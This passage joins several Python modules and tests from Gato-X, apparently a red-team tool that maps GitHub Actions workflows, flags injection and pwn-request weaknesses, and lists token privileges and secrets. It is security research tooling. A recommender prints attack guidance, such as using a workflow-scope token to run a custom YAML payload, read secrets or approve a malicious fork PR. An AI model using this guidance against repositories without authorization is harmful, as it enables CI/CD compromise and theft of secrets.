                    self.graph.add_edge(job_node, step_node, relation="contains")
                prev_step_node = step_node
                # Handle actions
                if "uses" in step:
                    action_name = step["uses"]
                    action_node = NodeFactory.create_action_node(
                        action_name,
                        workflow_wrapper.branch,
                        workflow_wrapper.getPath(),
                        workflow_wrapper.repo_name,
                    )
                    self.graph.add_node(action_node, **action_node.get_attrs())
                    self.graph.add_edge(step_node, action_node, relation="uses")

    async def initialize_node(self, node, api):
        tags = node.get_tags()
        if "uninitialized" in tags:
            if "ActionNode" in tags:
                try:
                    await self._initialize_action_node(node, api)
                except ValueError as e:
                    logger.warning(f"Error initializing action node: {e}")
                    # Likely encountered a syntax error in the workflow
                    return
            elif "WorkflowNode" in tags:
                try:
                    await self._initialize_callee_node(node, api)
                except ValueError as e:
                    logger.warning(f"Error initializing callee node: {e}")
                    # Likely encountered a syntax error in the workflow
                    return



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import json
import os
import glob


class ConfigurationManager:
    """
    A singleton class to manage configuration data.

    Attributes:
        _instance (ConfigurationManager): The singleton instance of the ConfigurationManager class.
        _config (dict): The loaded configuration data.
    """

    _instance = None
    _config = None

    def __new__(cls, *args, **kwargs):
        """
        Overrides the default object creation behavior to implement the singleton pattern.

        Returns:
            ConfigurationManager: The singleton instance of the ConfigurationManager class.
        """
        if cls._instance is None:
            cls._instance = super(ConfigurationManager, cls).__new__(
                cls, *args, **kwargs
            )
            script_dir = os.path.dirname(os.path.realpath(__file__))
            json_files = glob.glob(os.path.join(script_dir, "*.json"))
            for file_path in json_files:
                cls._instance.load(file_path)
        return cls._instance

    def load(self, file_path):
        """
        Loads a JSON file and merges its entries into the existing configuration data.

        Args:
            file_path (str): The path to the JSON file to load.
        """
        with open(file_path, "r") as f:
            config = json.load(f)
            if self._config is None:
                self._config = {}
                self._config[config["name"]] = config["entries"]
            else:
                self._config[config["name"]] = config["entries"]

    def __getattr__(self, name):
        """
        Overrides the default attribute access behavior. If the attribute name matches the 'name' field in the configuration data, it returns the 'entries' field. Otherwise, it raises an AttributeError.

        Args:
            name (str): The name of the attribute to access.

        Returns:
            dict: The 'entries' field of the configuration data if the attribute name matches the 'name' field.

        Raises:
            AttributeError: If the attribute name does not match the 'name' field in the configuration data.
        """
        if self._config and name in self._config:
            return self._config[name]
        else:
            raise AttributeError(
                f"'ConfigurationManager' object has no attribute '{name}'"
            )



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import json

from gatox.caching.cache_manager import CacheManager


class LocalCacheFactory:
    """
    A factory class for managing local cache operations in Gato-X.

    This class provides static methods to serialize and deserialize the cache
    to/from local files. The cache stores GitHub Actions metadata in a format
    of 'repo_slug:action_path:ref'.
    """

    @staticmethod
    def dump_cache(output_file: str):
        """
        Serializes and dumps the current cache state to a local file.

        The cache is written in JSON format containing key-value pairs where
        keys follow the format 'repo_slug:action_path:ref'.

        Args:
            output_file (str): Path to the file where the cache should be written.
        """
        with open(output_file, "w") as f:
            CacheManager().serialize_full_cache(f)

    @staticmethod
    def load_cache_from_file(saved_cache: str):
        """
        Loads and deserializes cache data from a local file into memory.

        The method validates the cache format and enforces naming conventions
        before loading the cache entries into the CacheManager.

        Args:
            saved_cache (str): Path to the file containing the cached data.

        Raises:
            ValueError: If the cache key format is invalid or if repository
                       slug is not lowercase.

        Example cache key format:
            'owner/repo:actions/checkout:v2'
        """
        with open(saved_cache, "r") as f:
            data = json.load(f)
            for key, val in data.items():
                parts = key.split(":")
                if len(parts) != 3:
                    raise ValueError(
                        f"Invalid cache key format '{key}'. Expected 'repo_slug:action_path:ref'."
                    )
                if parts[0] != parts[0].lower():
                    raise ValueError(f"Repository slug '{parts[0]}' must be lowercase.")

                repo_slug, action_path, ref = parts
                CacheManager().set_action(repo_slug, action_path, ref, val)



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

# THis class encapsulates the logic for a result factory.
# it takes a Graph traversal path and worlks from start to end in order
# to populate the result.
from gatox.enumerate.results.issue_type import IssueType
from gatox.enumerate.results.pwn_request_result import PwnRequestResult
from gatox.enumerate.results.injection_result import InjectionResult
from gatox.enumerate.results.dispatch_toctou_result import DispatchTOCTOUResult
from gatox.enumerate.results.review_injection_result import ReviewInjectionResult


class ResultFactory:

    @staticmethod
    def create_pwn_result(path: list, confidence_score, attack_complexity):
        # Add logic for additional processing, augmentation.

        return PwnRequestResult(path, confidence_score, attack_complexity)

    @staticmethod
    def create_injection_result(path: list, confidence_score, attack_complexity):
        # Add logic for additional processing, augmentation.

        return InjectionResult(path, confidence_score, attack_complexity)

    @staticmethod
    def create_toctou_result(path: list, confidence_score, attack_complexity):
        # Add logic for additional processing, augmentation.

        return DispatchTOCTOUResult(path, confidence_score, attack_complexity)

    @staticmethod
    def create_review_injection_result(path: list, confidence_score, attack_complexity):
        # Add logic for additional processing, augmentation.

        return ReviewInjectionResult(path, confidence_score, attack_complexity)



from gatox.workflow_graph.nodes.node import Node


def test_node_init():
    """Test Node initialization"""
    node = Node("test_node")
    assert node.name == "test_node"


def test_node_repr():
    """Test Node string representation"""
    node = Node("test_node")
    assert repr(node) == "Node('test_node')"


def test_node_hash():
    """Test Node hash function"""
    node1 = Node("test_node")
    node2 = Node("test_node")
    assert hash(node1) == hash(node2)
    assert hash(node1) == hash(("test_node", "Node"))


def test_node_equality():
    """Test Node equality comparison"""
    node1 = Node("test_node")
    node2 = Node("test_node")
    node3 = Node("different_node")

    assert node1 == node2
    assert node1 != node3
    assert node1 != "not_a_node"


def test_node_get_needs():
    """Test Node get_needs method"""
    node = Node("test_node")
    assert node.get_needs() == []


def test_node_get_tags():
    """Test Node get_tags method"""
    node = Node("test_node")
    assert node.get_tags() == {"Node"}



import tempfile
import os
import subprocess
import logging
import hashlib
import asyncio

from gatox.models.workflow import Workflow

logger = logging.getLogger(__name__)


class Git:
    """Git handler for cloning repositories and checking workflows."""

    def __init__(
        self,
        pat: str,
        repository: str,
        work_dir: str = None,
        username="Gato-X",
        email="gato-x@pwn.com",
        proxies=None,
        github_url="github.com",
    ):
        self.pat = pat
        self.repository = repository
        self.work_dir = work_dir if work_dir else tempfile.mkdtemp()
        if not github_url:
            self.github_url = "github.com"
        else:
            self.github_url = github_url

        if self.github_url != "github.com" or proxies:
            os.environ["GIT_SSL_NO_VERIFY"] = "True"

        if proxies:
            os.environ["ALL_PROXY"] = proxies["https"]

        self.clone_comamnd = (
            "git clone --depth 1 --filter=blob:none --sparse"
            f" https://{pat}@{self.github_url}/{repository}"
        )

        if len(repository.split("/")) != 2:
            raise ValueError("Repository name but be in Org/Repo format!")

        self.config_command1 = f"git config user.name '{username}'"
        self.config_command2 = f"git config user.email '{email}'"
        self.repository = repository

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        await self.cleanup()

    async def cleanup(self):
        """Clean up temporary directory"""
        if os.path.exists(self.work_dir):
            subprocess.run(["rm", "-rf", self.work_dir], check=True)

    async def get_non_default(self) -> list:
        """Get all workflows in non-default branches.

        Returns:
            list: List of Workflow objects
        """
        workflows = []
        try:
            url = f"https://{self.pat}@github.com/{self.repository}"

            # Create process to clone the repo
            proc = await asyncio.create_subprocess_exec(
                "git",
                "clone",
                "--no-checkout",
                url,
                self.work_dir,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            await proc.communicate()

            # Get all remote branches
            proc = await asyncio.create_subprocess_exec(
                "git",
                "-C",
                self.work_dir,
                "branch",
                "-r",
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            stdout, _ = await proc.communicate()
            branches = stdout.decode().splitlines()

            for branch in branches:
                branch = branch.strip()
                if branch.startswith("origin/HEAD"):
                    continue

                # Checkout branch
                proc = await asyncio.create_subprocess_exec(
                    "git",
                    "-C",
                    self.work_dir,
                    "checkout",
                    branch.replace("origin/", ""),
                    stdout=asyncio.subprocess.PIPE,
                    stderr=asyncio.subprocess.PIPE,
                )
                await proc.communicate()

                workflow_dir = os.path.join(self.work_dir, ".github", "workflows")
                if os.path.exists(workflow_dir):
                    for filename in os.listdir(workflow_dir):
                        if filename.endswith((".yml", ".yaml")):
                            with open(os.path.join(workflow_dir, filename), "r") as f:
                                contents = f.read()
                                workflows.append(
                                    Workflow(
                                        self.repository,
                                        contents,
                                        filename,
                                        branch=branch.replace("origin/", ""),
                                    )
                                )

        except subprocess.CalledProcessError as e:
            logger.warning(f"Git operation failed: {e}")
        except Exception as e:
            logger.warning(f"Error processing repository {self.repository}: {e}")
        finally:
            await self.cleanup()

        return workflows

    async def extract_workflow_ymls(self, repo_path: str = None):
        """Extracts and returns all github workflow .yml files located within
        the cloned repository.

        Args:
            repo_path (str, optional): Path on disk to repository to extract
            workflow yml files from. Defaults to repository associated with
            this object. Parameter intended for future uses and unit testing.
        Returns:
            list: List of yml files read from repository.
        """
        repo_path = repo_path if repo_path else self.work_dir
        ymls = []

        if os.path.isdir(os.path.join(repo_path, ".github", "workflows")):
            workflows = os.listdir(os.path.join(repo_path, ".github", "workflows"))
            for wf in workflows:
                wf_p = os.path.join(repo_path, ".github", "workflows", wf)
                if os.path.isfile(wf_p):
                    with open(wf_p, "r") as wf_in:
                        wf_yml = wf_in.read()
                        ymls.append((wf, wf_yml))
        return ymls



import argparse
import os
import re


class StringType(object):

    def __init__(self, length_cap, regex=None):

        self.length_cap = length_cap
        self.regex = regex

    def __call__(self, string):
        """Validate the length and regex against the string, and then
        return the value if it is valid.

        Args:
            string (str): String argument to validate.

        Raises:
            ArgumentTypeError: Error if the argument exceeds the maximum length
            or does not match the configured regular expression.
        """
        if self.length_cap and len(string) > self.length_cap:
            raise argparse.ArgumentTypeError(
                f"The maximum length is {self.length_cap} characters!"
            )

        if self.regex and not re.match(self.regex, string):
            raise argparse.ArgumentTypeError("The argument is not in the valid format!")

        return string


class WriteableDir(object):

    def __call__(self, dirpath: str):
        """Checks if the path is of a directory that exists and can be
        written to.

        Args:
            dirpath (str): Path to a directory to check.

        Raises:
            argparse.ArgumentTypeError: _description_
            argparse.ArgumentTypeError: _description_

        Returns:
            str: Same path after validation.
        """

        if os.path.isdir(dirpath):
            if os.access(dirpath, os.W_OK):
                return dirpath
            raise argparse.ArgumentTypeError(
                f"The directory: {dirpath} is not writeable!"
            )
        else:
            raise argparse.ArgumentTypeError(
                f"The directory: {dirpath} does not exist!"
            )


class WritablePath(object):
    def __call__(self, filepath: str) -> str:
        """
        Checks that filepath is writable if it exists, or can be created if it does not exist.

        Args:
            filepath (str): The path to check.

        Raises:
            argparse.ArgumentTypeError: Raised if we cannot create or write to the file.

        Returns:
            str: The validated path.
        """

        parent_dir = os.path.dirname(filepath) or "."

        if os.path.exists(filepath):
            # Check if we can write to it
            if not os.access(filepath, os.W_OK):
                raise argparse.ArgumentTypeError(
                    f"Cannot write to existing file: {filepath}"
                )
        else:
            # Check if parent directory is writable
            if not os.path.isdir(parent_dir):
                raise argparse.ArgumentTypeError(
                    f"Directory does not exist: {parent_dir}"
                )
            if not os.access(parent_dir, os.W_OK):
                raise argparse.ArgumentTypeError(f"Cannot create file at: {filepath}")

        return filepath


class ReadableFile(object):

    def __call__(self, filepath: str):
        """Argument validation function for file paths.

        Args:
            filepath (str): Path to a file to check if the file exists
            and that it can be read.

        Raises:
            argparse.ArgumentTypeError: Raised if the file cannot be read.
            argparse.ArgumentTypeError: Raised if the file does not exist.

        Returns:
            str: Same path after validation.
        """

        if os.path.exists(filepath):
            if os.access(filepath, os.R_OK):
                return filepath
            raise argparse.ArgumentTypeError(f"The file: {filepath} is not readable!")
        else:
            raise argparse.ArgumentTypeError(f"The file: {filepath} does not exist!")


def is_valid_directory(parser, arg):
    if not os.path.isdir(arg):
        parser.error("The directory {} does not exist!".format(arg))
    else:
        # File exists so return the directory
        return arg


def read_file_and_validate_lines(filepath: str, regex: str):
    """Reads a file and validates that each line matches the regular
    expression.

    Args:
        filepath (str): Path to the file.
        regex (str): Regular expression to use.

    Returns:
        list: List of lines that match the regular expression.
    """

    lines = []
    pat = re.compile(regex)

    with open(filepath, "r") as f_in:
        for line in f_in:
            match = pat.match(line)
            if not match:
                raise argparse.ArgumentError(
                    None,
                    f" The line '{line.strip()}' did not match the regular"
                    f" expression!",
                )
            lines.append(match.group(0))
    return lines



import pytest
from gatox.enumerate.results.complexity import Complexity


def test_complexity_enum_values():
    """Test that all enum values are correctly defined with expected strings"""
    assert Complexity.ZERO_CLICK.value == "No Interaction"
    assert Complexity.PREVIOUS_CONTRIBUTOR.value == "Previous Contributor"
    assert Complexity.FOLLOW_UP.value == "Persistent Approval Gated"
    assert Complexity.TOCTOU.value == "Time-of-Check to Time-of-Use"
    assert Complexity.BROKEN_ACCESS.value == "Broken Access Control"


def test_complexity_string_representation():
    """Test string and repr representations of Complexity enum"""
    assert str(Complexity.ZERO_CLICK) == "No Interaction"
    assert repr(Complexity.ZERO_CLICK) == "No Interaction"
    assert str(Complexity.BROKEN_ACCESS) == "Broken Access Control"
    assert repr(Complexity.BROKEN_ACCESS) == "Broken Access Control"


def test_complexity_explain():
    """Test explain method returns correct descriptions"""
    explanations = {
        Complexity.ZERO_CLICK: "Exploit requires no user interaction, you must still confirm there are no custom permission checks that would prevent the attack.",
        Complexity.PREVIOUS_CONTRIBUTOR: "Exploit requires a previous contributor to the repository, and the repository must use the default pull-request approval setting.",
        Complexity.FOLLOW_UP: "Exploit requires a maintainer to perform some state changing action, such as labeling a PR, at that point the attacker can follow up with their payload.",
        Complexity.TOCTOU: "Exploit requires updating pull request quickly after the maintainer performs an approval action, make sure the approval action runs on forks for this to be feasible.",
        Complexity.BROKEN_ACCESS: "Exploit requires the attacker to have some access, but the access control mechanism is not properly implemented.",
    }

    for complexity, expected in explanations.items():
        assert complexity.explain() == expected


def test_complexity_members():
    """Test that Complexity enum has all expected members"""
    expected_members = [
        "ZERO_CLICK",
        "PREVIOUS_CONTRIBUTOR",
        "FOLLOW_UP",
        "TOCTOU",
        "BROKEN_ACCESS",
    ]

    actual_members = [member.name for member in Complexity]
    assert sorted(actual_members) == sorted(expected_members)



import json

from gatox.cli.output import Output
from gatox.models.repository import Repository
from gatox.models.organization import Organization
from gatox.models.runner import Runner
from gatox.models.secret import Secret

from gatox.enumerate.reports.actions import ActionsReport
from gatox.enumerate.reports.runners import RunnersReport


class Recommender:

    @staticmethod
    def print_repo_attack_recommendations(scopes: list, repository: Repository):
        """Prints attack recommendations for repositories.

        Args:
            scopes (list): List of scopes for user who ran Gato.
            repository (Repository): Repository wrapper object.
        """

        if not repository.sh_runner_access:
            if repository.is_admin():
                Output.owned(
                    "The user is an administrator on the repository, but no "
                    "self-hosted runners were detected!"
                )
            return

        if repository.is_admin():
            Output.owned("The user is an administrator on the repository!")
            if "workflow" in scopes:
                Output.result(
                    "The PAT also has the workflow scope, which means a "
                    "custom YAML payload can be used!"
                )
            else:
                Output.inform(
                    "The PAT does not have the workflow scope, which means an "
                    "existing workflow trigger must be used!"
                )
                Output.tabbed(
                    "Look for a job in the workflow YAML that checks out the "
                    "repository, AND then runs code that can be modified "
                    "within the repository!"
                )
                if repository.is_public():
                    Output.tabbed(
                        "Additionally, since the repository is public this "
                        "token can be used to approve a malicious fork PR!"
                    )
        elif repository.is_maintainer():
            Output.result("The user is a maintainer on the repository!")
            if "workflow" in scopes:
                Output.result(
                    "The user also has the workflow scope, which means a "
                    "custom YAML payload can be used!"
                )
            else:
                Output.inform(
                    "The user does not have the workflow scope, which means "
                    "an existing workflow trigger must be used!"
                )
                Output.tabbed(
                    "Look for a job in the workflow YAML that checks out the "
                    "repository, AND then runs code that can be modified "
                    "within the repository!"
                )
                if repository.is_public():
                    Output.tabbed(
                        "Additionally, since the repository is public this "
                        "token can be used to approve a malicious fork PR!"
                    )
        elif repository.can_push():
            Output.result("The user can push to the repository!")
            if "workflow" in scopes:
                Output.owned(
                    "The user also has the workflow scope, which means a "
                    "custom YAML payload can be used!"
                )
            else:
                Output.inform(
                    "The user does not have the workflow scope, which means "
                    "an existing workflow trigger must be used!"
                )
                Output.tabbed(
                    "Look for a job in the workflow YAML that checks out the "
                    "repository, AND then runs code that can be modified "
                    "within the repository!"
                )

    @staticmethod
    def print_repo_secrets(scopes, secrets: list[Secret]):
        """Prints list of repository level secrets.

        Args:
            scopes (list): List of OAuth scopes.
            secrets (list[Secret]): List of secret wrapper objects.
        """

        if not secrets:
            return

        if "workflow" in scopes:
            Output.owned(
                "The repository can access "
                f"{Output.bright(len(secrets))} secret(s) and the "
                "token can use a workflow to read them!"
            )
        else:
            Output.info(
                f"The repository can access "
                f"{Output.bright(len(secrets))} secret(s), but the "
                "token cannot trigger a new workflow!"
            )

        for secret in secrets:
            if secret.environment:
                Output.tabbed(
                    f"\t{Output.yellow('Environment')}: {Output.bright(secret.environment)},"
                    f" Secret Name: {Output.bright(secret.name)},"
                    f" last updated {Output.bright(secret.secret_data['updated_at'])}"
                )
            else:
                Output.tabbed(
                    f"\t{Output.bright(secret.name)},"
                    f" last updated {Output.bright(secret.secret_data['updated_at'])}"
                )

    @staticmethod
    def print_repo_runner_info(repository: Repository):
        """Prints information about repository level self-hosted runners.

        Args:
            repository (Repository): Repository wrapper object.
        """

        if repository.runners:
            Output.result(
                f"The repository has {len(repository.runners)} repo-level"
                " self-hosted runners!"
            )
            RunnersReport.report_runners(repository)

    @staticmethod
    def print_runner_info(runners: list[Runner]):
        """Print information about runners.

        Args:
            runners (dict): Runner result returned from the GitHub API
        """

        for runner in runners:
            runner_name = runner.runner_name
            runner_os = runner.os
            runner_status = runner.status
            labels = ", ".join([elem["name"] for elem in runner.labels])

            Output.tabbed(
                f"Name: {Output.bright(runner_name)}, OS: "
                f"{Output.bright(runner_os)} Status: "
                f"{Output.bright(runner_status)}"
            )

            if labels:
                Output.tabbed(f"The runner has the following labels: {labels}!")

    @staticmethod
    def print_org_findings(scopes, organization: Organization):
        """Prints findings related to an organization, and provides context for
        attacks/future investigation based on the scopes a user has.

        Args:
            organization (Organization): Organization wrapper object.
        """
        if organization.org_admin_user:
            Output.owned("The user is an organization owner!")
            if "admin:org" in scopes:
                Output.result(
                    f"The token also has the {Output.yellow('admin:org')} "
                    "scope. This token has extensive access to the GitHub"
                    " organization!"
                )
        elif organization.org_member:
            Output.result("The user is likely an organization member!")
        else:
            Output.warn("The user has only public access!")

        if organization.runners:
            Output.result(
                f"The organization has {len(organization.runners)} org-level"
                " self-hosted runners!"
            )
            Recommender.print_runner_info(organization.runners)

        if organization.secrets:
            Output.owned(
                f"The organization has "
                f"{Output.bright(len(organization.secrets))} secret(s)!"
            )
            Output.result("The secret names are:")
            for secret in organization.secrets:
                Output.tabbed(
                    f"\t{Output.bright(secret.name)}, "
                    f"last updated {secret.secret_data['updated_at']}"
                )



import yaml
import logging

from yaml import CSafeLoader

logger = logging.getLogger(__name__)


class Composite:
    """
    A class to parse GitHub Action ymls.
    """

    def __init__(self, action_yml: str):
        """
        Initializes the CompositeParser instance by loading and parsing the provided YAML file.

        Args:
            action_yml (str): The YAML file to parse.
        """
        self.composite = False
        self.parsed_yml = None
        try:
            self.parsed_yml = yaml.load(
                action_yml.replace("\t", "  "), Loader=CSafeLoader
            )
        except (
            yaml.parser.ParserError,
            yaml.scanner.ScannerError,
            yaml.constructor.ConstructorError,
        ) as parse_error:
            self.invalid = True
        except ValueError as parse_error:
            self.invalid = True
        except Exception as parse_error:
            logging.error(
                f"Received an exception while parsing action contents: {str(parse_error)}"
            )
            self.invalid = True

        if not self.parsed_yml or type(self.parsed_yml) != dict:
            self.invalid = True
        else:
            self.composite = self._check_composite()

    def _check_composite(self):
        """
        Checks if the parsed YAML file represents a composite GitHub Actions workflow.

        Returns:
            bool: True if the parsed YAML file represents a composite GitHub
            Actions workflow, False otherwise.
        """
        if "runs" in self.parsed_yml and "using" in self.parsed_yml["runs"]:
            return self.parsed_yml["runs"]["using"] == "composite"



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.enumerate.results.confidence import Confidence
from gatox.enumerate.results.issue_type import IssueType
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_parser.utility import CONTEXT_REGEX
from gatox.workflow_parser.utility import (
    getTokens,
    getToken,
    checkUnsafe,
    prReviewUnsafe,
)
from gatox.workflow_graph.visitors.visitor_utils import VisitorUtils
from gatox.caching.cache_manager import CacheManager
from gatox.github.api import Api


class ReviewInjectionVisitor:
    """
    This class implements a graph visitor tasked with identifying
    injection issues on the pull_request_review and
    pull_request_review comment triggers.
    """

    @staticmethod
    async def find_injections(graph: TaggedGraph, api: Api):
        """
        Identify potential injection vulnerabilities within GitHub workflows.

        This method analyzes the workflow graph to detect injection issues by
        examining paths from nodes tagged with relevant injection-related tags
        (e.g., "issue_comment", "pull_request_target") and checking for vulnerabilities
        based on environment variables and input parameters.

        The analysis involves:
        1. Retrieving all nodes tagged with specific injection-related tags from the workflow graph.
        2. For each of these nodes, performing a Depth-First Search (DFS) to find paths
           that lead to nodes tagged with "injectable".
        3. Iterating through each path and analyzing nodes to determine potential injection
           vulnerabilities based on variable handling and environment rules.
        4. Aggregating the results and rendering them in an ASCII format for easy visualization.

        Args:
            graph (TaggedGraph): The workflow graph containing all nodes and their relationships.
            api (Api): An instance of the API wrapper to interact with GitHub APIs.
            ignore_workflow_run (bool, optional): Flag to determine whether to ignore "workflow_run" tags. Defaults to False.

        Returns:
            None

        Raises:
            Exception: Logs any exceptions that occur during the processing of individual paths,
                       allowing the analysis to continue without interruption.
        """
        query_taglist = [
            "pull_request_review_comment",
            "pull_request_review",
        ]

        nodes = graph.get_nodes_for_tags(query_taglist)

        all_paths = []
        results = {}
        rule_cache = {}

        for cn in nodes:
            paths = await graph.dfs_to_tag(cn, "injectable", api)
            if paths:
                all_paths.append(paths)

        for path_set in all_paths:
            for path in path_set:
                input_lookup = {}
                env_lookup = {}
                flexible_lookup = {}

                approval_gate = False
                for index, node in enumerate(path):
                    tags = node.get_tags()

                    if "JobNode" in tags:
                        # Check deployment environment rules
                        if node.deployments:
                            if node.repo_name() in rule_cache:
                                rules = rule_cache[node.repo_name()]
                            else:
                                rules = await api.get_all_environment_protection_rules(
                                    node.repo_name()
                                )
                                rule_cache[node.repo_name()] = rules
                            for deployment in node.deployments:
                                if isinstance(deployment, dict):
                                    deployment = deployment["name"]
                                deployment = VisitorUtils.process_context_var(
                                    deployment
                                )

                                if deployment in rules:
                                    approval_gate = True

                        paths = await graph.dfs_to_tag(node, "permission_check", api)
                        if paths:
                            approval_gate = True

                        env_vars = node.get_env_vars()
                        for key, val in env_vars.items():
                            if isinstance(val, str):
                                if "github." in val:
                                    env_lookup[key] = val

                        if node.outputs:
                            for o_key, val in node.outputs.items():
                                if not isinstance(val, str):
                                    continue

                                if "env." in val and val not in env_lookup:
                                    for key in env_lookup.keys():
                                        if key in val:
                                            flexible_lookup[o_key] = env_lookup[key]
                    elif "StepNode" in tags:
                        if "injectable" in tags:
                            # We need to figure out what variables are referenced.
                            # Also, need to consider the multi-tag DFS option
                            # because the true injection might be later.

                            if approval_gate is True:
                                continue

                            filtered_contexts = set()

                            # Now we go and try to resolve variables.
                            for variable in node.contexts:

                                if "inputs." in variable:
                                    if "${{" in variable:
                                        processed_var = CONTEXT_REGEX.findall(variable)
                                        if processed_var:
                                            processed_var = processed_var[0]
                                            if "inputs." in processed_var:
                                                processed_var = processed_var.replace(
                                                    "inputs.", ""
                                                )
                                    else:
                                        processed_var = variable

                                    if processed_var in env_lookup:
                                        original_val = env_lookup[processed_var]
                                        variable = original_val

                                    variable = getToken(variable)
                                    filtered_contexts.add(variable)

                                elif "env." in variable:
                                    for key, val in env_lookup.items():
                                        if key in variable:
                                            variable = val
                                            variable = getToken(variable)
                                            filtered_contexts.add(variable)
                                            break
                                else:
                                    filtered_contexts.add(variable)

                            for val in filtered_contexts:
                                if "${{" in val:
                                    val = getTokens(val)
                                    if val:
                                        val = val[0]

                                if "github." in val and not prReviewUnsafe(val):
                                    continue
                                elif prReviewUnsafe(val) or "body" in val:
                                    conf = Confidence.HIGH
                                    VisitorUtils._add_results(
                                        path,
                                        results,
                                        IssueType.PR_REVIEW_INJECTON,
                                        confidence=conf,
                                    )
                                    break
                    elif "WorkflowNode" in tags:
                        if index != 0 and "JobNode" in path[index - 1].get_tags():
                            # Caller job node
                            node_params = path[index - 1].params
                            # Set lookup for input params
                            input_lookup.update(node_params)
                        if index == 0:
                            repo = CacheManager().get_repository(node.repo_name())

                            # Check workflow environment variables.
                            # For env vars that are github.event.*
                            env_vars = node.get_env_vars()
                            for key, val in env_vars.items():
                                if isinstance(val, str):
                                    if "github." in val:
                                        env_lookup[key] = val
                    elif "ActionNode" in tags:
                        await VisitorUtils.initialize_action_node(graph, api, node)

                # Goal here is to start from the top and keep track
                # of any variables that come out of steps
                # or get passed through workflow calls.
                # We also want to ensure tracking inside of
                # composite actions.

        return results



from gatox.workflow_parser.expression_parser import ExpressionParser
from gatox.workflow_parser.expression_evaluator import ExpressionEvaluator


# steps.get_changes.outputs.changed != 0
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# steps.get_changes.outputs.changed != 0
# steps.get_changes.outputs.changed != 0
# always() && (needs.backport.result == 'failure' || needs.backport-ent.result == 'failure')
# env.lychee_exit_code != 0
# ( github.event.action == 'opened' && steps.is-team-member.outputs.MESSAGE == 'false' )
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# ${{ endsWith(inputs.repository-name, '-enterprise') }}
# contains(inputs.sample-name, 'build')
# contains(inputs.sample-name, 'ent')
# always() && (needs.backport.result == 'failure' || needs.backport-ent.result == 'failure')
# steps.get_changes.outputs.changed != 0
# contains(steps.dependabot-metadata.outputs.dependency-names, 'github.com/hashicorp/terraform-plugin-sdk/v2' ) &&  (steps.dependabot-metadata.outputs.update-type == 'version-update:semver-patch' || steps.dependabot-metadata.outputs.update-type == 'version-update:semver-minor')
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# github.event.deployment_status.state == 'success' && github.event.deployment.environment == 'production' && github.event.sender.id == 35613825
# github.event.deployment_status.state == 'success' && github.event.deployment.environment == 'preview' && github.event.sender.id == 35613825 && github.event.repository.name == 'dev-portal'
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# always() && (needs.get-go-version.result == 'failure' || needs.acceptance-test.result == 'failure')
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# ( github.event.action == 'opened' && steps.set-ticket-type.outputs.type != 'Task' ) || ( github.event.action == 'opened' && steps.set-ticket-type.outputs.type == 'Task' && steps.is-team-member.outputs.message == 'false' )
# ${{ github.ref != format('refs/tags/v{0}', steps.ext-version.outputs.content) }}
# ${{ github.ref != format('refs/tags/v{0}', steps.ext-version.outputs.VERSION) }}
# ( github.event.action == 'opened' && steps.is-team-member.outputs.MESSAGE == 'false' )
# contains(fromJSON('["success", "failure"]'), steps.test-version.outcome)
# contains(fromJSON('["success", "failure"]'), steps.test-version.outcome)
# always() && (needs.build-artifacts.result == 'failure' || needs.github-release.result == 'failure')
# steps.get_changes.outputs.changed != 0
# always() && (needs.tests-summarize.result == 'failure')
# ( github.event.action == 'opened' && steps.is-team-member.outputs.MESSAGE == 'false' )
# always() && (needs.tests-summarize.result == 'failure')


def test_parse1():
    if_check1 = "(((github.event.action == 'labeled' && (github.event.label.name == 'approved' || github.event.label.name == 'lgtm' || github.event.label.name == 'ok-to-test')) || (github.event.action != 'labeled' && (contains(github.event.pull_request.labels.*.name, 'ok-to-test') || contains(github.event.pull_request.labels.*.name, 'approved') || contains(github.event.pull_request.labels.*.name, 'lgtm')))) && github.repository == 'feast-dev/feast')"

    expr = ExpressionParser(if_check1)

    expr.print_ast()


def test_parse2():
    if_check = "github.event.issue.pull_request\n&& contains(github.event.comment.body, '[test]')\n&& contains(fromJson('[\"OWNER\", \"MEMBER\"]'), github.event.comment.author_association)\n"

    expr = ExpressionParser(if_check)
    expr.print_ast()
    variables = {
        "github.event.issue.pull_request": True,
